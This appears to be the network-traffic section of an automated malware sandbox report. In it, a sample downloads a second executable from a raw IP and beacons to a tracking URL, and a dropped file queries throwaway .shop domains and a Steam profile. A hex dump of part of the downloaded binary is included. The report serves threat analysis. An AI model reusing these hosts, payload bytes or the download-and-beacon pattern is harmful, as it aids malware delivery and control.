                                                                                                                                                                                                                            Jan 12, 2025 17:45:29.349535942 CET8049708176.113.115.19192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:29.349549055 CET4970880192.168.2.9176.113.115.19
                                                                                                                                                                                                                            Jan 12, 2025 17:45:29.349555969 CET8049708176.113.115.19192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:29.349569082 CET4970880192.168.2.9176.113.115.19
                                                                                                                                                                                                                            Jan 12, 2025 17:45:29.349570036 CET8049708176.113.115.19192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:29.349581003 CET8049708176.113.115.19192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:29.349592924 CET8049708176.113.115.19192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:29.349610090 CET4970880192.168.2.9176.113.115.19
                                                                                                                                                                                                                            Jan 12, 2025 17:45:29.349634886 CET4970880192.168.2.9176.113.115.19
                                                                                                                                                                                                                            Jan 12, 2025 17:45:29.349634886 CET4970880192.168.2.9176.113.115.19
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.013031006 CET6335453192.168.2.91.1.1.1
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.017843962 CET53633541.1.1.1192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.017920971 CET6335453192.168.2.91.1.1.1
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.018064976 CET6335453192.168.2.91.1.1.1
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.022809029 CET53633541.1.1.1192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.465146065 CET53633541.1.1.1192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.466156006 CET6335453192.168.2.91.1.1.1
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.471153975 CET53633541.1.1.1192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.471210003 CET6335453192.168.2.91.1.1.1
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.773757935 CET63355443192.168.2.9104.102.49.254
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.773799896 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.775341988 CET63355443192.168.2.9104.102.49.254
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.776436090 CET63355443192.168.2.9104.102.49.254
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.776451111 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:33.427232027 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:33.427318096 CET63355443192.168.2.9104.102.49.254
                                                                                                                                                                                                                            Jan 12, 2025 17:45:33.430597067 CET63355443192.168.2.9104.102.49.254
                                                                                                                                                                                                                            Jan 12, 2025 17:45:33.430607080 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:33.430919886 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:33.477163076 CET63355443192.168.2.9104.102.49.254
                                                                                                                                                                                                                            Jan 12, 2025 17:45:33.523327112 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.023334980 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.023345947 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.023361921 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.023390055 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.023410082 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.023426056 CET63355443192.168.2.9104.102.49.254
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.023439884 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.023500919 CET63355443192.168.2.9104.102.49.254
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.023500919 CET63355443192.168.2.9104.102.49.254
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.062432051 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.062503099 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.062524080 CET63355443192.168.2.9104.102.49.254
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.062532902 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.062551022 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.062566042 CET63355443192.168.2.9104.102.49.254
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.062625885 CET63355443192.168.2.9104.102.49.254
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.064872026 CET63355443192.168.2.9104.102.49.254
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.064888000 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.065021992 CET63355443192.168.2.9104.102.49.254
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.065028906 CET44363355104.102.49.254192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.144104958 CET8049708176.113.115.19192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:34.144160986 CET4970880192.168.2.9176.113.115.19
                                                                                                                                                                                                                            Jan 12, 2025 17:47:16.554189920 CET4970880192.168.2.9176.113.115.19
                                                                                                                                                                                                                            Jan 12, 2025 17:47:16.857903004 CET4970880192.168.2.9176.113.115.19
                                                                                                                                                                                                                            Jan 12, 2025 17:47:17.467299938 CET4970880192.168.2.9176.113.115.19
                                                                                                                                                                                                                            Jan 12, 2025 17:47:18.670442104 CET4970880192.168.2.9176.113.115.19
                                                                                                                                                                                                                            Jan 12, 2025 17:47:21.076879025 CET4970880192.168.2.9176.113.115.19
                                                                                                                                                                                                                            Jan 12, 2025 17:47:25.889224052 CET4970880192.168.2.9176.113.115.19
                                                                                                                                                                                                                            Jan 12, 2025 17:47:35.654854059 CET4970880192.168.2.9176.113.115.19
                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Jan 12, 2025 17:45:26.539771080 CET5596453192.168.2.91.1.1.1
                                                                                                                                                                                                                            Jan 12, 2025 17:45:26.555310965 CET53559641.1.1.1192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:31.991559029 CET6226253192.168.2.91.1.1.1
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.001600981 CET53622621.1.1.1192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.005795002 CET5765153192.168.2.91.1.1.1
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.012697935 CET53576511.1.1.1192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.468764067 CET5188453192.168.2.91.1.1.1
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.477606058 CET53518841.1.1.1192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.479037046 CET5487053192.168.2.91.1.1.1
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.489742041 CET53548701.1.1.1192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.491900921 CET6318953192.168.2.91.1.1.1
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.499198914 CET53631891.1.1.1192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.501842976 CET5207053192.168.2.91.1.1.1
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.511121035 CET53520701.1.1.1192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.512265921 CET5075953192.168.2.91.1.1.1
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.606159925 CET53507591.1.1.1192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.610363960 CET5855653192.168.2.91.1.1.1
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.700870037 CET53585561.1.1.1192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.711611032 CET6266853192.168.2.91.1.1.1
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.723561049 CET53626681.1.1.1192.168.2.9
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.724910975 CET6095153192.168.2.91.1.1.1
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.731618881 CET53609511.1.1.1192.168.2.9
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Jan 12, 2025 17:45:26.539771080 CET192.168.2.91.1.1.10x7898Standard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:31.991559029 CET192.168.2.91.1.1.10x9e25Standard query (0)skidjazzyric.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.005795002 CET192.168.2.91.1.1.10x275dStandard query (0)soundtappysk.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.018064976 CET192.168.2.91.1.1.10x1Standard query (0)soundtappysk.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.468764067 CET192.168.2.91.1.1.10xa5e8Standard query (0)femalsabler.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.479037046 CET192.168.2.91.1.1.10x1b0bStandard query (0)apporholis.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.491900921 CET192.168.2.91.1.1.10x8d5cStandard query (0)crowdwarek.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.501842976 CET192.168.2.91.1.1.10x89c4Standard query (0)versersleep.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.512265921 CET192.168.2.91.1.1.10xc798Standard query (0)chipdonkeruz.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.610363960 CET192.168.2.91.1.1.10xa6caStandard query (0)handscreamny.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.711611032 CET192.168.2.91.1.1.10xba92Standard query (0)robinsharez.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.724910975 CET192.168.2.91.1.1.10x5996Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Jan 12, 2025 17:45:26.555310965 CET1.1.1.1192.168.2.90x7898No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:26.555310965 CET1.1.1.1192.168.2.90x7898No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.001600981 CET1.1.1.1192.168.2.90x9e25Name error (3)skidjazzyric.clicknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.465146065 CET1.1.1.1192.168.2.90x1Name error (3)soundtappysk.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.477606058 CET1.1.1.1192.168.2.90xa5e8Name error (3)femalsabler.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.489742041 CET1.1.1.1192.168.2.90x1b0bName error (3)apporholis.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.499198914 CET1.1.1.1192.168.2.90x8d5cName error (3)crowdwarek.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.511121035 CET1.1.1.1192.168.2.90x89c4Name error (3)versersleep.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.606159925 CET1.1.1.1192.168.2.90xc798Name error (3)chipdonkeruz.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.700870037 CET1.1.1.1192.168.2.90xa6caName error (3)handscreamny.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.723561049 CET1.1.1.1192.168.2.90xba92Name error (3)robinsharez.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Jan 12, 2025 17:45:32.731618881 CET1.1.1.1192.168.2.90x5996No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            • post-to-me.com
                                                                                                                                                                                                                            • steamcommunity.com
                                                                                                                                                                                                                            • 176.113.115.19
                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.949708176.113.115.19807784C:\Users\user\Desktop\g3toRYa6JE.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Jan 12, 2025 17:45:28.085918903 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                                                                                                                                                                            User-Agent: ShareScreen
                                                                                                                                                                                                                            Host: 176.113.115.19
                                                                                                                                                                                                                            Jan 12, 2025 17:45:28.771418095 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Sun, 12 Jan 2025 16:45:28 GMT
                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                            Last-Modified: Sun, 12 Jan 2025 16:45:01 GMT
                                                                                                                                                                                                                            ETag: "62a00-62b850c908464"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Content-Length: 403968
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ec be f9 b4 a8 df 97 e7 a8 df 97 e7 a8 df 97 e7 b6 8d 13 e7 89 df 97 e7 b6 8d 02 e7 bc df 97 e7 b6 8d 14 e7 c4 df 97 e7 8f 19 ec e7 ab df 97 e7 a8 df 96 e7 d9 df 97 e7 b6 8d 1d e7 a9 df 97 e7 b6 8d 03 e7 a9 df 97 e7 b6 8d 06 e7 a9 df 97 e7 52 69 63 68 a8 df 97 e7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 f9 fd 95 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 36 04 00 00 70 08 00 00 00 00 00 b7 14 00 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 0c 00 00 04 00 00 02 17 07 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$RichPELf6pP@i(iP.text46 `.rdataV"P$:@@.data|^@.nosuSHt@.muwavZ`@.roxahp@@.rsrcij@@
                                                                                                                                                                                                                            Jan 12, 2025 17:45:28.771429062 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 04 80 44 00 75 02 f3 c3 e9 b2 04 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 29 06 00 00 8b
                                                                                                                                                                                                                            Data Ascii: ;DuUQeVEPuu)u9EttM^USVuF3u@t9FW>+~,WPVYP;uFyFN _Ff^[]
                                                                                                                                                                                                                            Jan 12, 2025 17:45:28.771812916 CET1236INData Raw: ff 55 8b ec 56 8b 75 08 85 f6 75 09 56 e8 35 00 00 00 59 eb 2f 56 e8 7c ff ff ff 59 85 c0 74 05 83 c8 ff eb 1f f7 46 0c 00 40 00 00 74 14 56 e8 93 0e 00 00 50 e8 bf 0e 00 00 59 f7 d8 59 1b c0 eb 02 33 c0 5e 5d c3 6a 14 68 d0 65 44 00 e8 ed 12 00
                                                                                                                                                                                                                            Data Ascii: UVuuV5Y/V|YtF@tVPYY3^]jheD3}}jY}3u;5JJ98t^@tVPVYY3BUJHt/9UuPJYtE9}utP/YuE}F3uJ4V
                                                                                                                                                                                                                            Jan 12, 2025 17:45:28.771825075 CET1236INData Raw: 00 00 59 6a 00 ff 15 9c 50 44 00 68 c8 51 44 00 ff 15 98 50 44 00 83 3d e0 94 44 00 00 75 08 6a 01 e8 1f 36 00 00 59 68 09 04 00 c0 ff 15 94 50 44 00 50 ff 15 90 50 44 00 c9 c3 8b ff 55 8b ec 8b 45 08 33 c9 3b 04 cd 10 80 44 00 74 13 41 83 f9 2d
                                                                                                                                                                                                                            Data Ascii: YjPDhQDPD=Duj6YhPDPPDUE3;DtA-rHwjX]D]DjY;#]1uxD1u|DUVMQY0^]jh`fDM3;v.jX3;E@u
                                                                                                                                                                                                                            Jan 12, 2025 17:45:28.771836996 CET1236INData Raw: 33 c9 66 83 fe 0a 0f 94 c1 43 43 83 85 44 e5 ff ff 02 89 b5 40 e5 ff ff 89 8d 20 e5 ff ff 3c 01 74 04 3c 02 75 52 ff b5 40 e5 ff ff e8 bd 3c 00 00 59 66 3b 85 40 e5 ff ff 0f 85 68 03 00 00 83 85 38 e5 ff ff 02 83 bd 20 e5 ff ff 00 74 29 6a 0d 58
                                                                                                                                                                                                                            Data Ascii: 3fCCD@ <t<uR@<Yf;@h8 t)jXP@<Yf;@;80E9D'8T4D83@4@<9M (<D+4
                                                                                                                                                                                                                            Jan 12, 2025 17:45:28.771847963 CET672INData Raw: ff 75 10 ff 75 0c ff 75 08 e8 2e f8 ff ff 83 c4 0c 89 45 e4 eb 16 e8 ba f6 ff ff c7 00 09 00 00 00 e8 c2 f6 ff ff 89 38 83 4d e4 ff c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 c9 04 00 00 c3 ff 75 08 e8 eb 3d 00 00 59 c3 8b ff 55 8b ec 8b 45
                                                                                                                                                                                                                            Data Ascii: uuu.E8MEEu=YUEV3;uvVVVVV@^]jhfD;Eu?3;|;JrSSSSS<JLtP<Y
                                                                                                                                                                                                                            Jan 12, 2025 17:45:28.771858931 CET1236INData Raw: 59 e8 2f f4 ff ff c7 00 0c 00 00 00 89 5d e4 eb 0b 89 3e eb 07 57 e8 0f 3c 00 00 59 c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 39 02 00 00 c3 6a 0a e8 28 ff ff ff 59 c3 8b ff 55 8b ec 8b 45 08 56 8d 34 c5 80 81 44 00 83 3e 00 75 13 50 e8 22
                                                                                                                                                                                                                            Data Ascii: Y/]>W<YEE9j(YUEV4D>uP"YujY6PD^]DJVj^u;}JjPc<YYJujV5JJ<YYJujX^3DJ D|j^3DW
                                                                                                                                                                                                                            Jan 12, 2025 17:45:28.771869898 CET1236INData Raw: 0c ff ee ff ff 83 66 18 00 83 26 00 83 66 08 00 59 5e 5d c3 8b ff 55 8b ec 8b 45 08 56 8b f1 c6 46 0c 00 85 c0 75 63 e8 61 21 00 00 89 46 08 8b 48 6c 89 0e 8b 48 68 89 4e 04 8b 0e 3b 0d 68 8c 44 00 74 12 8b 0d 84 8b 44 00 85 48 70 75 07 e8 43 45
                                                                                                                                                                                                                            Data Ascii: f&fY^]UEVFuca!FHlHhN;hDtDHpuCEF;DtFDHpu=FF@puHpF@F^]A@tyt$IxQPLEYYuUVMEM>t}^]
                                                                                                                                                                                                                            Jan 12, 2025 17:45:28.771882057 CET1236INData Raw: ff e8 c2 2d 00 00 59 85 c0 8a 85 ef fd ff ff 59 74 22 8b 8d b4 fd ff ff 8d b5 d8 fd ff ff e8 a4 fb ff ff 8a 03 43 89 9d c4 fd ff ff 84 c0 0f 84 a4 fc ff ff 8b 8d b4 fd ff ff 8d b5 d8 fd ff ff e8 82 fb ff ff e9 4d 07 00 00 0f be c2 83 f8 64 0f 8f
                                                                                                                                                                                                                            Data Ascii: -YYt"CMdySAtHHtXHHtHH @9H00
                                                                                                                                                                                                                            Jan 12, 2025 17:45:28.771955967 CET1236INData Raw: 03 99 eb 02 33 d2 89 bd dc fd ff ff f6 c1 40 74 1b 3b d6 7f 17 7c 04 3b c6 73 11 f7 d8 83 d2 00 f7 da 81 8d f0 fd ff ff 00 01 00 00 f7 85 f0 fd ff ff 00 90 00 00 8b da 8b f8 75 02 33 db 83 bd e8 fd ff ff 00 7d 0c c7 85 e8 fd ff ff 01 00 00 00 eb
                                                                                                                                                                                                                            Data Ascii: 3@t;|;su3}9~u!ut-RPSWn?09~NE+Ftat90tV
                                                                                                                                                                                                                            Jan 12, 2025 17:45:28.776350975 CET1236INData Raw: 45 f4 83 60 70 fd 33 c0 e9 d8 01 00 00 39 7d 14 74 0c 83 7d 14 02 7c c9 83 7d 14 24 7f c3 8b 4d ec 53 8a 1e 89 7d fc 8d 7e 01 83 b9 ac 00 00 00 01 7e 17 8d 45 ec 50 0f b6 c3 6a 08 50 e8 8f 3b 00 00 8b 4d ec 83 c4 0c eb 10 8b 91 c8 00 00 00 0f b6
                                                                                                                                                                                                                            Data Ascii: E`p39}t}|}$MS}~~EPjP;MBtG-uM+uGEKB$9u*0tE4<xt<XtE!Eu0u<xt<XuGG3uN


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.949707104.21.56.704437784C:\Users\user\Desktop\g3toRYa6JE.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-12 16:45:27 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                                                                                                                                                            User-Agent: ShareScreen
                                                                                                                                                                                                                            Host: post-to-me.com
                                                                                                                                                                                                                            2025-01-12 16:45:27 UTC798INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Sun, 12 Jan 2025 16:45:27 GMT
                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e92YFGs15JQVUFJFXbI7%2BnlHOuDeL9hZ2tItdo1029pQQ4ZFnGxxputojj1kCDJmrOHU8Z6KrlIWPyVvGs6eDV5pzZVV%2FxHIDav9nENqtrWA2XXcoVraqSjzYIzLSvUPkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 900e9df81c3c9e04-EWR
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2006&min_rtt=2005&rtt_var=754&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=728&delivery_rate=1448412&cwnd=236&unsent_bytes=0&cid=f9a27f85483816fe&ts=914&x=0"
                                                                                                                                                                                                                            2025-01-12 16:45:27 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                            2025-01-12 16:45:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            1192.168.2.963355104.102.49.2544437968C:\Users\user\AppData\Local\Temp\26A5.tmp.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-12 16:45:33 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Host: steamcommunity.com
                                                                                                                                                                                                                            2025-01-12 16:45:34 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Date: Sun, 12 Jan 2025 16:45:33 GMT
                                                                                                                                                                                                                            Content-Length: 25665
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Set-Cookie: sessionid=64368e4dcc7c7ac93572902e; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                            2025-01-12 16:45:34 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
